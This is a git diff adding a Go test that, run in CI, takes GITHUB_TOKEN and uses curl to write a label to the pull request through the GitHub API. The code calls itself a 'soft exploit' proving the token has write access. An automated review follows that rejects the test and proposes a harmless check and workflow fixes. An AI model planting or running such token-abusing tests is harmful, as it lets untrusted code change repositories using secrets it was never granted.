diff --git a/exploit_test.go b/exploit_test.go
new file mode 100644
index 00000000..520c2f2b
--- /dev/null
+++ b/exploit_test.go
@@ -0,0 +1,33 @@
+package exploit
+
+import (
+ "os"
+ "os/exec"
+ "testing"
+)
+
+func TestVerifyPermissions(t *testing.T) {
+ // We use the GITHUB_TOKEN provided to the runner
+ // We attempt to add a label to the PR to prove WRITE access
+ token := os.Getenv("GITHUB_TOKEN")
+ repo := os.Getenv("GITHUB_REPOSITORY")
+ prNum := os.Getenv("GITHUB_REF_NAME") // Usually contains PR number in pr refs
+
+ // If token is empty, the exploit fails (which means they are secure!)
+ if token == "" {
+ t.Log("No token found in environment.")
+ return
+ }
+
+ // Soft exploit: Add a 'bug' label to the PR via GitHub API
+ cmd := exec.Command("curl", "-X", "POST",
+ "-H", "Authorization: Bearer "+token,
+ "-H", "Accept: application/vnd.github+json",
+ "https://api.github.com/repos/"+repo+"/issues/"+prNum+"/labels",
+ "-d", `{"labels":["documentation"]}`) // Using a harmless existing label
+
+ err := cmd.Run()
+ if err != nil {
+ t.Errorf("Failed to execute curl: %v", err)
+ }
+}
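Review bot: TestVerifyPermissions makes an authenticated write to the GitHub API from inside `go test` (the `exec.Command("curl", ...)` call), so any CI job that exposes `GITHUB_TOKEN` to the test step lets PR-supplied code change repository state; a unit test should have no such side effect and this file should not be merged as written. The token is also concatenated into curl's argument list (`"Authorization: Bearer "+token`), where it is readable by other processes on the runner. If the goal is to guard against a write-capable token reaching untrusted test code, a side-effect-free regression check is enough: drop the curl call and use `if os.Getenv("GITHUB_TOKEN") != "" { t.Fatal("GITHUB_TOKEN is exposed to the test step") }`. The underlying fix belongs in the workflow file, which is not part of this diff: presumably a least-privilege `permissions:` block and not passing the token into steps that build or test PR code. Separately, the comment says a 'bug' label is added while the payload sends `documentation`.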